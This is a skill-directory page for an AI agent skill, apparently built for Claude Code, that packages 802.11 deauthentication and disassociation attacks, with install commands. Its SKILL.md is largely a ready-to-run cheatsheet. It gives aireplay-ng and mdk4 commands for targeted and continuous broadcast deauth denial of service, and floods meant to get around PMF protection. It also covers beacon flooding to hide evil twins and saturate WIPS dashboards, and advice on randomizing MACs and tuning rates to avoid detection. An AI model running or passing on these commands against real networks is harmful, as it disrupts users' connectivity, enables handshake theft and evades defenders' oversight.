Agent SkillsSnailSploit/Claude-Red › offensive-deauth-disassoc

offensive-deauth-disassoc

GitHub

针对802.11网络的去认证/去关联攻击技能。涵盖单客户端握手捕获、广播DoS、PMF规避(动作帧攻击)及信标泛洪。支持aireplay-ng/mdk4工具,用于测试网络安全性或授权渗透。

Skills/wireless/offensive-deauth-disassoc/SKILL.md SnailSploit/Claude-Red

Trigger Scenarios

需要捕获WPA握手密钥时 进行授权无线拒绝服务测试时 评估PMF防护有效性时 测试客户端漫游逻辑或WIPS响应时

Install

npx skills add SnailSploit/Claude-Red --skill offensive-deauth-disassoc -g -y
More Options

Non-standard path

npx skills add https://github.com/SnailSploit/Claude-Red/tree/main/Skills/wireless/offensive-deauth-disassoc -g -y

Use without installing

npx skills use SnailSploit/Claude-Red@offensive-deauth-disassoc

指定 Agent (Claude Code)

npx skills add SnailSploit/Claude-Red --skill offensive-deauth-disassoc -a claude-code -g -y

安装 repo 全部 skill

npx skills add SnailSploit/Claude-Red --all -g -y

预览 repo 内 skill

npx skills add SnailSploit/Claude-Red --list

SKILL.md

Frontmatter
{
    "name": "offensive-deauth-disassoc",
    "description": "Deauthentication and disassociation attacks against 802.11 networks — targeted single-client deauth for handshake capture, broadcast deauth for DoS (with authorization), action-frame attacks bypassing 802.11w (PMF), beacon flooding, mdk4 \/ aireplay-ng tooling, and rate-limit \/ PMF-aware operation. Use to coerce client reconnection (handshake capture, evil-twin roaming), as targeted DoS, or to test PMF posture."
}

Deauth / Disassoc Attacks

The most-used 802.11 management-frame attack: send a forged deauthentication or disassociation frame as the AP, and the client disconnects. Modern PMF (802.11w) authenticates these frames cryptographically — but most consumer and many enterprise deployments still don't require PMF.

Quick Workflow

  1. Identify target client + AP (BSSID, channel)
  2. Pick deauth scope: single client (quiet) vs. broadcast (loud, DoS)
  3. Verify PMF status — if required, classic deauth fails; pivot to action-frame attacks
  4. Send the deauth burst at the right rate

Single-Client Deauth (Preferred)

Used to force handshake capture, push client to evil twin, or test reconnection behavior.

sudo aireplay-ng --deauth 5 \
  -a AA:BB:CC:DD:EE:FF \    # AP BSSID
  -c 11:22:33:44:55:66 \    # client MAC
  wlan0mon
  • --deauth 5 sends 5 deauths (10 frames — 5 to AP, 5 to client). 3–10 is usually enough.
  • More than 30 in a burst is unnecessarily noisy.

Broadcast Deauth (DoS, Use Sparingly)

# Single AP, all clients
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# --deauth 0 = continuous

# Multiple APs from a list
sudo mdk4 wlan0mon d -B target_bssids.txt -c 1,6,11

Only with explicit authorization. Continuous broadcast deauth is a clear DoS signal and trips most WIPS within seconds.

PMF (802.11w) Awareness

PMF authenticates deauth/disassoc frames. Status visible in beacon RSN capabilities:

sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>
# PMF column: Required / Capable / Off
PMF Status Deauth Effect
Off Classic deauth works
Capable (optional) Works against clients without PMF, fails against PMF-enabled clients
Required Classic deauth ignored — must use action-frame attacks

Action-Frame Attacks Against PMF

PMF protects deauth/disassoc but doesn't always protect all action frames. Specific action types remain exploitable:

# mdk4 multi-tool attacks
sudo mdk4 wlan0mon a -a <BSSID>     # auth attack: floods auth frames, AP eventually disconnects clients
sudo mdk4 wlan0mon m -t <BSSID>     # CTS frame attack — abuse virtual carrier sense
sudo mdk4 wlan0mon w -t <BSSID>     # WPA-Enterprise: SAE auth flood

Action frames the IEEE 802.11 spec marks as "may be unprotected" include some block-ack and channel-switch announcements — implementation-specific exploitation paths exist but require chipset-specific testing.

Beacon Flooding

Confuse clients (and WIPS) by flooding fake beacons:

sudo mdk4 wlan0mon b -f beacon_essids.txt -c 6 -s 100
# Floods 100 beacons/sec for ESSIDs in the file

Use cases:

  • Hide your evil twin among noise
  • Stress-test client roaming logic
  • DoS WIPS dashboards (flood with thousands of fake APs)

Rate Tuning and Detection

Burst Defender Signal
3–10 deauth, single client Often misclassified as roaming or RF noise
>30 deauth/sec from one source WIPS rule trips
Continuous broadcast deauth Clear DoS — alert + ticket within minutes
Beacon flood >50/sec Saturates WIPS dashboards

Randomize source MAC across burst-and-pause cycles to spread the signal.

Engagement Cheatsheet

# 1. Recon — note PMF status per target
sudo airodump-ng wlan0mon -c <ch> --bssid <BSSID>

# 2. Single-client deauth for handshake capture
sudo aireplay-ng --deauth 3 -a <BSSID> -c <client> wlan0mon

# 3. PMF blocking? Try action-frame attacks
sudo mdk4 wlan0mon a -a <BSSID>

# 4. DoS scenario (authorized)
sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon

Reporting

Document for each test:

  • Target BSSID + ESSID + PMF status
  • Burst size, duration
  • Effect observed (client reconnected? handshake captured? DoS achieved?)
  • Detection signals defender would have seen

Key References

Version History

  • aeb41ec Current 2026-07-05 18:43

Same Skill Collection

Skills/auth/offensive-jwt/SKILL.md
Skills/fuzzing/offensive-fuzzing/SKILL.md
Skills/infrastructure/offensive-shellcode/SKILL.md
Skills/wireless/offensive-krack-fragattacks/SKILL.md
Skills/wireless/offensive-wpa3-sae/SKILL.md
Skills/wireless/offensive-wps/SKILL.md
Skills/wireless/offensive-z-wave/SKILL.md
Skills/active-directory/offensive-active-directory/SKILL.md
Skills/cloud/offensive-cloud/SKILL.md
Skills/exploit-dev/offensive-toctou/SKILL.md
Skills/iot/offensive-iot/SKILL.md
Skills/mobile/offensive-mobile/SKILL.md
Skills/recon/offensive-osint/SKILL.md
Skills/utility/offensive-reporting/SKILL.md
Skills/web/offensive-business-logic/SKILL.md
Skills/web/offensive-sqli/SKILL.md
Skills/wireless/offensive-bluetooth-ble/SKILL.md
Skills/wireless/offensive-bluetooth-classic/SKILL.md
Skills/wireless/offensive-evil-twin/SKILL.md
Skills/wireless/offensive-lorawan-sub-ghz/SKILL.md
Skills/wireless/offensive-wifi-recon/SKILL.md
Skills/wireless/offensive-wifi/SKILL.md
Skills/wireless/offensive-wpa-enterprise/SKILL.md
Skills/wireless/offensive-wpa2-psk/SKILL.md
Skills/wireless/offensive-zigbee-thread-matter/SKILL.md

Metadata

Files
0
Version
aeb41ec
Hash
c29e7db4
Indexed
2026-07-05 18:43

Главная - Вики-сайт
Copyright © 2011-2026 iteam. Current version is 2.155.2. UTC+08:00, 2026-07-09 02:32
浙ICP备14020137号-1 $Гость$